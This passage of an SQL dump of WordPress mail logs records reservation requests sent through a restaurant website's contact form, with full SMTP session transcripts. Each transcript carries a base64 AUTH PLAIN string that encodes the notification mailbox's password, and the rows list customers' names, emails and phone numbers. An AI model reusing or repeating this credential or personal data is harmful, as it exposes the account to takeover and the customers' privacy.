tavolo per 2 persone per mercoledì 23 settembre\n\nAccettato\n\n--\nQuesta e-mail è stata inviata da un modulo di contatto su Sol Y Mar (https://www.ristorantesolymar.it)'),(21551,1073,'original_headers','From: Mauro Candi <notifiche@ristorantesolymar.it>\nX-WPCF7-Content-Type: text/plain\nReply-To: mauro23candi23@gmail.com\n'),(21552,1073,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Wed, 02 Sep 2020 10:34:48 -0400 \r\n220-We do not authorize the use of this system to transport unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250-STARTTLS\r\n250 HELP\r\nSTARTTLS\r\n220 TLS go ahead\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH PLAIN\r\n334 \r\nAG5vdGlmaWNoZUByaXN0b3JhbnRlc29seW1hci5pdABSb2JhbGRvMjAyMEA=\r\n235 Authentication succeeded\r\nMAIL FROM:<notifiche@ristorantesolymar.it>\r\n250 OK\r\nRCPT TO:<teosphone@gmail.com>\r\n250 Accepted\r\nDATA\r\n354 Enter message, ending with \".\" on a line by itself\r\nX-Mailer: Postman SMTP 2.0.15 for WordPress (https://wordpress.org/plugins/post-smtp/)\r\nX-WPCF7-Content-Type: text/plain\r\nContent-Type: text/plain; charset=UTF-8\r\nFrom: Mauro Candi <notifiche@ristorantesolymar.it>\r\nSender: notifiche@ristorantesolymar.it\r\nTo: teosphone@gmail.com\r\nReply-To: mauro23candi23@gmail.com\r\nMessage-Id: <7c5074fcd70a9d21437f5838d9b3dd27@ristorantesolymar.it>\r\nSubject: Da sito Sol Y Mar: \"prenotazione tavolo per 2 persone\"\r\nDate: Wed, 02 Sep 2020 14:34:48 +0000\r\nContent-Transfer-Encoding: quoted-printable\r\nContent-Disposition: inline\r\nMIME-Version: 1.0\r\n\r\nDa: Mauro Candi <mauro23candi23@gmail.com>=0ATelefono: 3423029793=0AOgge=\r\ntto: prenotazione tavolo per 2 persone=0A=0ACorpo del messaggio:=0AVorre=\r\ni prenotare un tavolo per 2 persone per mercoled=C3=AC 23 settembre=0A=\r\n=0AAccettato=0A=0A--=0AQuesta e-mail =C3=A8 stata inviata da un modulo d=\r\ni contatto su Sol Y Mar (https://www.ristorantesolymar.it)\r\n.\r\n250 OK id=1kDTqa-0005vI-VJ\r\n'),(21553,1074,'solution','All good, mail sent.'),(21554,1074,'success','1'),(21555,1074,'from_header','Sollini <notifiche@ristorantesolymar.it>'),(21556,1074,'to_header','teosphone@gmail.com'),(21557,1074,'reply_to_header','sollo.ravenna@gmail.com'),(21558,1074,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(21559,1074,'original_to','teosphone@gmail.com'),(21560,1074,'original_subject','Da sito Sol Y Mar: \"Prenotazione\"'),(21561,1074,'original_message','Da: Sollini <sollo.ravenna@gmail.com>\nTelefono: 3396360030\nOggetto: Prenotazione\n\nCorpo del messaggio:\nBuongiorno avete un tavolo per sabato 12 per 5 persone alle 21 grazie\n\nAccettato\n\n--\nQuesta e-mail è stata inviata da un modulo di contatto su Sol Y Mar (https://www.ristorantesolymar.it)'),(21562,1074,'original_headers','From: Sollini <notifiche@ristorantesolymar.it>\nX-WPCF7-Content-Type: text/plain\nReply-To: sollo.ravenna@gmail.com\n'),(21563,1074,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Fri, 04 Sep 2020 06:26:32 -0400 \r\n220-We do not authorize the use of this system to transport unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250-STARTTLS\r\n250 HELP\r\nSTARTTLS\r\n220 TLS go ahead\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH PLAIN\r\n334 \r\nAG5vdGlmaWNoZUByaXN0b3JhbnRlc29seW1hci5pdABSb2JhbGRvMjAyMEA=\r\n235 Authentication succeeded\r\nMAIL FROM:<notifiche@ristorantesolymar.it>\r\n250 OK\r\nRCPT TO:<teosphone@gmail.com>\r\n250 Accepted\r\nDATA\r\n354 Enter message, ending with \".\" on a line by itself\r\nX-Mailer: Postman SMTP 2.0.15 for WordPress (https://wordpress.org/plugins/post-smtp/)\r\nX-WPCF7-Content-Type: text/plain\r\nContent-Type: text/plain; charset=UTF-8\r\nFrom: Sollini <notifiche@ristorantesolymar.it>\r\nSender: notifiche@ristorantesolymar.it\r\nTo: teosphone@gmail.com\r\nReply-To: sollo.ravenna@gmail.com\r\nMessage-Id: <7cdb8bf37e48fa9054a32bc17e81d915@ristorantesolymar.it>\r\nSubject: Da sito Sol Y Mar: \"Prenotazione\"\r\nDate: Fri, 04 Sep 2020 10:26:32 +0000\r\nContent-Transfer-Encoding: quoted-printable\r\nContent-Disposition: inline\r\nMIME-Version: 1.0\r\n\r\nDa: Sollini <sollo.ravenna@gmail.com>=0ATelefono: 3396360030=0AOggetto:=\r\n Prenotazione=0A=0ACorpo del messaggio:=0ABuongiorno avete un tavolo per=\r\n sabato 12 per 5 persone alle 21 grazie=0A=0AAccettato=0A=0A--=0AQuesta=\r\n e-mail =C3=A8 stata inviata da un modulo di contatto su Sol Y Mar (http=\r\ns://www.ristorantesolymar.it)\r\n.\r\n250 OK id=1kE8vQ-0006DO-IH\r\n'),(21564,1075,'solution','All good, mail sent.'),(21565,1075,'success','1'),(21566,1075,'from_header','Claudio <notifiche@ristorantesolymar.it>'),(21567,1075,'to_header','teosphone@gmail.com'),(21568,1075,'reply_to_header','claudiocurti60@gmail.com'),(21569,1075,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(21570,1075,'original_to','teosphone@gmail.com'),(21571,1075,'original_subject','Da sito Sol Y Mar: \"Prenotazione\"'),(21572,1075,'original_message','Da: Claudio <claudiocurti60@gmail.com>\nTelefono: 3933317367\nOggetto: Prenotazione\n\nCorpo del messaggio:\nBuongiorno, \r\nVolevo prenotare per domenica 13 settembre alle ore 13,00 per n. 2 persone possibilmente all’esterno, avendo un cane.\r\nResto in attesa di una vostra conferma.\r\nGrazie \r\nClaudio Curti\n\nAccettato\n\n--\nQuesta e-mail è stata inviata da un modulo di contatto su Sol Y Mar (https://www.ristorantesolymar.it)'),(21573,1075,'original_headers','From: Claudio <notifiche@ristorantesolymar.it>\nX-WPCF7-Content-Type: text/plain\nReply-To: claudiocurti60@gmail.com\n'),(21574,1075,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Mon, 07 Sep 2020 15:23:57 -0400 \r\n220-We do not authorize the use of this system to transport unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250-STARTTLS\r\n250 HELP\r\nSTARTTLS\r\n220 TLS go ahead\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH PLAIN\r\n334 \r\nAG5vdGlmaWNoZUByaXN0b3JhbnRlc29seW1hci5pdABSb2JhbGRvMjAyMEA=\r\n235 Authentication succeeded\r\nMAIL FROM:<notifiche@ristorantesolymar.it>\r\n250 OK\r\nRCPT TO:<teosphone@gmail.com>\r\n250 Accepted\r\nDATA\r\n354 Enter message, ending with \".\" on a line by itself\r\nX-Mailer: Postman SMTP 2.0.15 for WordPress (https://wordpress.org/plugins/post-smtp/)\r\nX-WPCF7-Content-Type: text/plain\r\nContent-Type: text/plain; charset=UTF-8\r\nFrom: Claudio <notifiche@ristorantesolymar.it>\r\nSender: notifiche@ristorantesolymar.it\r\nTo: teosphone@gmail.com\r\nReply-To: claudiocurti60@gmail.com\r\nMessage-Id: <553b1db3021f0a227a37aa32b4bea072@ristorantesolymar.it>\r\nSubject: Da sito Sol Y Mar: \"Prenotazione\"\r\nDate: Mon, 07 Sep 2020 19:23:57 +0000\r\nContent-Transfer-Encoding: quoted-printable\r\nContent-Disposition: inline\r\nMIME-Version: 1.0\r\n\r\nDa: Claudio <claudiocurti60@gmail.com>=0ATelefono: 3933317367=0AOggetto:=\r\n Prenotazione=0A=0ACorpo del messaggio:=0ABuongiorno, =0D=0AVolevo preno=\r\ntare per domenica 13 settembre alle ore 13,00 per n. 2 persone possibilm=\r\nente all=E2=80=99esterno, avendo un cane.=0D=0AResto in attesa di una vo=\r\nstra conferma.=0D=0AGrazie =0D=0AClaudio Curti=0A=0AAccettato=0A=0A--=0A=\r\nQuesta e-mail =C3=A8 stata inviata da un modulo di contatto su Sol Y Mar=\r\n (https://www.ristorantesolymar.it)\r\n.\r\n250 OK id=1kFMk9-0007rv-62\r\n'),(21575,1076,'solution','All good, mail sent.'),(21576,1076,'success','1'),(21577,1076,'from_header','Claudio <notifiche@ristorantesolymar.it>'),(21578,1076,'to_header','teosphone@gmail.com'),(21579,1076,'reply_to_header','claudiocurti60@gmail.com'),(21580,1076,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(21581,1076,'original_to','teosphone@gmail.com'),(21582,1076,'original_subject','Da sito Sol Y Mar: \"Prenotazione\"'),(21583,1076,'original_message','Da: Claudio <claudiocurti60@gmail.com>\nTelefono: 3933317367\nOggetto: Prenotazione\n\nCorpo del messaggio:\nBuongiorno, \r\nVolevo prenotare per domenica 13 settembre alle ore 13,00 per n. 2 persone possibilmente all’esterno, avendo un cane.\r\nResto in attesa di una vostra conferma.\r\nGrazie \r\nClaudio Curti\n\nAccettato\n\n--\nQuesta e-mail è stata inviata da un modulo di contatto su Sol Y Mar (https://www.ristorantesolymar.it)'),(21584,1076,'original_headers','From: Claudio <notifiche@ristorantesolymar.it>\nX-WPCF7-Content-Type: text/plain\nReply-To: claudiocurti60@gmail.com\n'),(21585,1076,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Mon, 07 Sep 2020 15:23:58 -0400 \r\n220-We do not authorize the use of this system to transport unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250-STARTTLS\r\n250 HELP\r\nSTARTTLS\r\n220 TLS go ahead\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH PLAIN\r\n334 \r\nAG5vdGlmaWNoZUByaXN0b3JhbnRlc29seW1hci5pdABSb2JhbGRvMjAyMEA=\r\n235 Authentication succeeded\r\nMAIL FROM:<notifiche@ristorantesolymar.it>\r\n250 OK\r\nRCPT TO:<teosphone@gmail.com>\r\n250 Accepted\r\nDATA\r\n354 Enter message, ending with \".\" on a line by itself\r\nX-Mailer: Postman SMTP 2.0.15 for WordPress (https://wordpress.org/plugins/post-smtp/)\r\nX-WPCF7-Content-Type: text/plain\r\nContent-Type: text/plain; charset=UTF-8\r\nFrom: Claudio <notifiche@ristorantesolymar.it>\r\nSender: notifiche@ristorantesolymar.it\r\nTo: teosphone@gmail.com\r\nReply-To: claudiocurti60@gmail.com\r\nMessage-Id: <a8b3a9e5bb7e8474f876a7234670859a@ristorantesolymar.it>\r\nSubject: Da sito Sol Y Mar: \"Prenotazione\"\r\nDate: Mon, 07 Sep 2020 19:23:58 +0000\r\nContent-Transfer-Encoding: quoted-printable\r\nContent-Disposition: inline\r\nMIME-Version: 1.0\r\n\r\nDa: Claudio <claudiocurti60@gmail.com>=0ATelefono: 3933317367=0AOggetto:=\r\n Prenotazione=0A=0ACorpo del messaggio:=0ABuongiorno, =0D=0AVolevo preno=\r\ntare per domenica 13 settembre alle ore 13,00 per n. 2 persone possibilm=\r\nente all=E2=80=99esterno, avendo un cane.=0D=0AResto in attesa di una vo=\r\nstra conferma.=0D=0AGrazie =0D=0AClaudio Curti=0A=0AAccettato=0A=0A--=0A=\r\nQuesta e-mail =C3=A8 stata inviata da un modulo di contatto su Sol Y Mar=\r\n (https://www.ristorantesolymar.it)\r\n.\r\n250 OK id=1kFMkA-0007s6-2L\r\n'),(21586,1077,'solution','All good, mail sent.'),(21587,1077,'success','1'),(21588,1077,'from_header','Francesco <notifiche@ristorantesolymar.it>'),(21589,1077,'to_header','teosphone@gmail.com'),(21590,1077,'reply_to_header','francesco.belloi@hotmail.it'),(21591,1077,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(21592,1077,'original_to','teosphone@gmail.com'),(21593,1077,'original_subject','Da sito Sol Y Mar: \"Prenotazione sabato 12 settembre\"'),(21594,1077,'original_message','Da: Francesco <francesco.belloi@hotmail.it>\nTelefono: 3296428527\nOggetto: Prenotazione sabato 12 settembre\n\nCorpo del messaggio:\nBuonasera, \r\nVi scrivo perché vorrei prenotare un tavolo per 2 persone sabato 12 ore 21:00. Vorremmo festeggiare il nostro anniversario presso di voi.\r\n\r\n\r\n\r\nChiedo cortesemente la conferma della prenotazione.\r\n\r\nGrazie mille\r\nSaluti\r\nFB\n\nAccettato\n\n--\nQuesta e-mail è stata inviata da un modulo di contatto su Sol Y Mar (https://www.ristorantesolymar.it)'),(21595,1077,'original_headers','From: Francesco <notifiche@ristorantesolymar.it>\nX-WPCF7-Content-Type: text/plain\nReply-To: francesco.belloi@hotmail.it\n'),(21596,1077,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Tue, 08 Sep 2020 12:37:04 -0400 \r\n220-We do not authorize the use of this system to transport unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250-STARTTLS\r\n250 HELP\r\nSTARTTLS\r\n220 TLS go ahead\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH PLAIN\r\n334 \r\nAG5vdGlmaWNoZUByaXN0b3JhbnRlc29seW1hci5pdABSb2JhbGRvMjAyMEA=\r\n235 Authentication succeeded\r\nMAIL FROM:<notifiche@ristorantesolymar.it>\r\n250 OK\r\nRCPT TO:<teosphone@gmail.com>\r\n250 Accepted\r\nDATA\r\n354 Enter message, ending with \".\" on a line by itself\r\nX-Mailer: Postman SMTP 2.0.15 for WordPress (https://wordpress.org/plugins/post-smtp/)\r\nX-WPCF7-Content-Type: text/plain\r\nContent-Type: text/plain; charset=UTF-8\r\nFrom: Francesco <notifiche@ristorantesolymar.it>\r\nSender: notifiche@ristorantesolymar.it\r\nTo: teosphone@gmail.com\r\nReply-To: francesco.belloi@hotmail.it\r\nMessage-Id: <f4fde22818a88f4808ec074a17f9a9c0@ristorantesolymar.it>\r\nSubject: Da sito Sol Y Mar: \"Prenotazione sabato 12 settembre\"\r\nDate: Tue, 08 Sep 2020 16:37:04 +0000\r\nContent-Transfer-Encoding: quoted-printable\r\nContent-Disposition: inline\r\nMIME-Version: 1.0\r\n\r\nDa: Francesco <francesco.belloi@hotmail.it>=0ATelefono: 3296428527=0AOgg=\r\netto: Prenotazione sabato 12 settembre=0A=0ACorpo del messaggio:=0ABuona=\r\nsera, =0D=0AVi scrivo perch=C3=A9 vorrei prenotare un tavolo per 2 perso=\r\nne sabato 12 ore 21:00. Vorremmo festeggiare il nostro anniversario pres=\r\nso di voi.=0D=0A=0D=0A=0D=0A=0D=0AChiedo cortesemente la conferma della=\r\n prenotazione.=0D=0A=0D=0AGrazie mille=0D=0ASaluti=0D=0AFB=0A=0AAccettat=\r\no=0A=0A--=0AQuesta e-mail =C3=A8 stata inviata da un modulo di contatto=\r\n su Sol Y Mar (https://www.ristorantesolymar.it)\r\n.\r\n250 OK id=1kFgcC-0001d1-Gw\r\n'),(21597,1078,'solution','All good, mail sent.'),(21598,1078,'success','1'),(21599,1078,'from_header','Simone Scarponi <notifiche@ristorantesolymar.it>'),(21600,1078,'to_header','teosphone@gmail.com'),(21601,1078,'reply_to_header','simo.scarponi@gmail.com'),(21602,1078,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(21603,1078,'original_to','teosphone@gmail.com'),(21604,1078,'original_subject','Da sito Sol Y Mar: \"Prenotazione\"'),(21605,1078,'original_message','Da: Simone Scarponi <simo.scarponi@gmail.com>\nTelefono: 3347676779\nOggetto: Prenotazione\n\nCorpo del messaggio:\nSalve, è possibile prenotare per questo sabato 12 settembre alle ore  21.00?\r\n\r\nGrazie\n\nAccettato\n\n--\nQuesta e-mail è stata inviata da un modulo di contatto su Sol Y Mar (https://www.ristorantesolymar.it)'),(21606,1078,'original_headers','From: Simone Scarponi <notifiche@ristorantesolymar.it>\nX-WPCF7-Content-Type: text/plain\nReply-To: simo.scarponi@gmail.com\n'),(21607,1078,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Wed, 09 Sep 2020 17:58:05 -0400 \r\n220-We do not authorize the use of this system to transport unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250-STARTTLS\r\n250 HELP\r\nSTARTTLS\r\n220 TLS go ahead\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH PLAIN\r\n334 \r\nAG5vdGlmaWNoZUByaXN0b3JhbnRlc29seW1hci5pdABSb2JhbGRvMjAyMEA=\r\n235 Authentication succeeded\r\nMAIL FROM:<notifiche@ristorantesolymar.it>\r\n250 OK\r\nRCPT TO:<teosphone@gmail.com>\r\n250 Accepted\r\nDATA\r\n354 Enter message, ending with \".\" on a line by itself\r\nX-Mailer: Postman SMTP 2.0.15 for WordPress (https://wordpress.org/plugins/post-smtp/)\r\nX-WPCF7-Content-Type: text/plain\r\nContent-Type: text/plain; charset=UTF-8\r\nFrom: Simone Scarponi <notifiche@ristorantesolymar.it>\r\nSender: notifiche@ristorantesolymar.it\r\nTo: teosphone@gmail.com\r\nReply-To: simo.scarponi@gmail.com\r\nMessage-Id: <69dc76b221ca843ffbbaf2b753004246@ristorantesolymar.it>\r\nSubject: Da sito Sol Y Mar: \"Prenotazione\"\r\nDate: Wed, 09 Sep 2020 21:58:05 +0000\r\nContent-Transfer-Encoding: quoted-printable\r\nContent-Disposition: inline\r\nMIME-Version: 1.0\r\n\r\nDa: Simone Scarponi <simo.scarponi@gmail.com>=0ATelefono: 3347676779=0AO=\r\nggetto: Prenotazione=0A=0ACorpo del messaggio:=0ASalve, =C3=A8 possibile=\r\n prenotare per questo sabato 12 settembre alle ore  21.00?=0D=0A=0D=0AGr=\r\nazie=0A=0AAccettato=0A=0A--=0AQuesta e-mail =C3=A8 stata inviata da un m=\r\nodulo di contatto su Sol Y Mar (https://www.ristorantesolymar.it)\r\n.\r\n250 OK id=1kG86P-0005JH-8h\r\n'),(21608,1079,'solution','All good, mail sent.'),(21609,1079,'success','1'),(21610,1079,'from_header','Marchi pier paolo <notifiche@ristorantesolymar.it>'),(21611,1079,'to_header','teosphone@gmail.com'),(21612,1079,'reply_to_header','marchipierpablo737@gmail.com'),(21613,1079,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(21614,1079,'original_to','teosphone@gmail.com'),(21615,1079,'original_subject','Da sito Sol Y Mar: \"Prenotazione per sabato sera 12 settembre\"'),(21616,1079,'original_message','Da: Marchi pier paolo <marchipierpablo737@gmail.com>\nTelefono: 3477148463\nOggetto: Prenotazione per sabato sera 12 settembre\n\nCorpo del messaggio:\nCiao..chiedevo se e possibile prenotare per 2 persone a cena ,anche sul tardi) sabato  prossimo 12 settembre?..grazie\n\nAccettato\n\n--\nQuesta e-mail è stata inviata da un modulo di contatto su Sol Y Mar (https://www.ristorantesolymar.it)'),(21617,1079,'original_headers','From: Marchi pier paolo <notifiche@ristorantesolymar.it>\nX-WPCF7-Content-Type: text/plain\nReply-To: marchipierpablo737@gmail.com\n'),(21618,1079,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Thu, 10 Sep 2020 13:09:53 -0400 \r\n220-We do not authorize the use of this system to transport unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250-STARTTLS\r\n250 HELP\r\nSTARTTLS\r\n220 TLS go ahead\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH PLAIN\r\n334 \r\nAG5vdGlmaWNoZUByaXN0b3JhbnRlc29seW1hci5pdABSb2JhbGRvMjAyMEA=\r\n235 Authentication succeeded\r\nMAIL FROM:<notifiche@ristorantesolymar.it>\r\n250 OK\r\nRCPT TO:<teosphone@gmail.com>\r\n250 Accepted\r\nDATA\r\n354 Enter message, ending with \".\" on a line by itself\r\nX-Mailer: Postman SMTP 2.0.15 for WordPress (https://wordpress.org/plugins/post-smtp/)\r\nX-WPCF7-Content-Type: text/plain\r\nContent-Type: text/plain; charset=UTF-8\r\nFrom: Marchi pier paolo <notifiche@ristorantesolymar.it>\r\nSender: notifiche@ristorantesolymar.it\r\nTo: teosphone@gmail.com\r\nReply-To: marchipierpablo737@gmail.com\r\nMessage-Id: <03f7f2c06abdc287048e07b07a32d20c@ristorantesolymar.it>\r\nSubject: Da sito Sol Y Mar: \"Prenotazione per sabato sera 12 settembre\"\r\nDate: Thu, 10 Sep 2020 17:09:53 +0000\r\nContent-Transfer-Encoding: quoted-printable\r\nContent-Disposition: inline\r\nMIME-Version: 1.0\r\n\r\nDa: Marchi pier paolo <marchipierpablo737@gmail.com>=0ATelefono: 3477148=\r\n463=0AOggetto: Prenotazione per sabato sera 12 settembre=0A=0ACorpo del=\r\n messaggio:=0ACiao..chiedevo se e possibile prenotare per 2 persone a ce=\r\nna ,anche sul tardi) sabato  prossimo 12 settembre?..grazie=0A=0AAccetta=\r\nto=0A=0A--=0AQuesta e-mail =C3=A8 stata inviata da un modulo di contatto=\r\n su Sol Y Mar (https://www.ristorantesolymar.it)\r\n.\r\n250 OK id=1kGQ53-0004IH-CE\r\n'),(21619,1080,'solution','All good, mail sent.'),(21620,1080,'success','1'),(21621,1080,'from_header','Sara Carminati <notifiche@ristorantesolymar.it>'),(21622,1080,'to_header','teosphone@gmail.com'),(21623,1080,'reply_to_header','s.carminati@hotmail.it'),(21624,1080,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(21625,1080,'original_to','teosphone@gmail.com'),(21626,1080,'original_subject','Da sito Sol Y Mar: \"Richiesta prenotazione per il 12/9 ore 21\"'),(21627,1080,'original_message','Da: Sara Carminati <s.carminati@hotmail.it>\nTelefono: 3339745677\nOggetto: Richiesta prenotazione per il 12/9 ore 21\n\nCorpo del messaggio:\nBuongiorno \r\nSarei interessata a prenotare un tavolo per questa sera ore 21 per 2 persone.\r\nGrazie per un vostro feedback.\r\nSara\n\nAccettato\n\n--\nQuesta e-mail è stata inviata da un modulo di contatto su Sol Y Mar (https://www.ristorantesolymar.it)'),(21628,1080,'original_headers','From: Sara Carminati <notifiche@ristorantesolymar.it>\nX-WPCF7-Content-Type: text/plain\nReply-To: s.carminati@hotmail.it\n'),(21629,1080,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Sat, 12 Sep 2020 07:27:31 -0400 \r\n220-We do not authorize the use of this system to transport unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250-STARTTLS\r\n250 HELP\r\nSTARTTLS\r\n220 TLS go ahead\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH PLAIN\r\n334 \r\nAG5vdGlmaWNoZUByaXN0b3JhbnRlc29seW1hci5pdABSb2JhbGRvMjAyMEA=\r\n235 Authentication succeeded\r\nMAIL FROM:<notifiche@ristorantesolymar.it>\r\n250 OK\r\nRCPT TO:<teosphone@gmail.com>\r\n250 Accepted\r\nDATA\r\n354 Enter message, ending with \".\" on a line by itself\r\nX-Mailer: Postman SMTP 2.0.15 for WordPress (https://wordpress.org/plugins/post-smtp/)\r\nX-WPCF7-Content-Type: text/plain\r\nContent-Type: text/plain; charset=UTF-8\r\nFrom: Sara Carminati <notifiche@ristorantesolymar.it>\r\nSender: notifiche@ristorantesolymar.it\r\nTo: teosphone@gmail.com\r\nReply-To: s.carminati@hotmail.it\r\nMessage-Id: <a325df9e434ffd7f53fd0ce4840aaa48@ristorantesolymar.it>\r\nSubject: Da sito Sol Y Mar: \"Richiesta prenotazione per il 12/9 ore 21\"\r\nDate: Sat, 12 Sep 2020 11:27:31 +0000\r\nContent-Transfer-Encoding: quoted-printable\r\nContent-Disposition: inline\r\nMIME-Version: 1.0\r\n\r\nDa: Sara Carminati <s.carminati@hotmail.it>=0ATelefono: 3339745677=0AOgg=\r\netto: Richiesta prenotazione per il 12/9 ore 21=0A=0ACorpo del messaggio=\r\n:=0ABuongiorno =0D=0ASarei interessata a prenotare un tavolo per questa=\r\n sera ore 21 per 2 persone.=0D=0AGrazie per un vostro feedback.=0D=0ASar=\r\na=0A=0AAccettato=0A=0A--=0AQuesta e-mail =C3=A8 stata inviata da un modu=\r\nlo di contatto su Sol Y Mar (https://www.ristorantesolymar.it)\r\n.\r\n250 OK id=1kH3gp-00020E-O2\r\n'),(21630,1081,'solution','All good, mail sent.'),(21631,1081,'success','1'),(21632,1081,'from_header','Windt <notifiche@ristorantesolymar.it>'),(21633,1081,'to_header','teosphone@gmail.com'),(21634,1081,'reply_to_header','peeterwindt@gmail.com'),(21635,1081,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(21636,1081,'original_to','teosphone@gmail.com'),(21637,1081,'original_subject','Da sito Sol Y Mar: \"prenotare\"'),(21638,1081,'original_message','Da: Windt <peeterwindt@gmail.com>\nTelefono: 0031622378496\nOggetto: prenotare\n\nCorpo del messaggio:\ne pessibile di prenotare per stasera verso le 8 per 4 persone?\n\nAccettato\n\n--\nQuesta e-mail è stata inviata da un modulo di contatto su Sol Y Mar (https://www.ristorantesolymar.it)'),(21639,1081,'original_headers','From: Windt <notifiche@ristorantesolymar.it>\nX-WPCF7-Content-Type: text/plain\nReply-To: peeterwindt@gmail.com\n'),(21640,1081,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Sun, 13 Sep 2020 08:52:31 -0400 \r\n220-We do not authorize the use of this system to transport unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250-STARTTLS\r\n250 HELP\r\nSTARTTLS\r\n220 TLS go ahead\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH 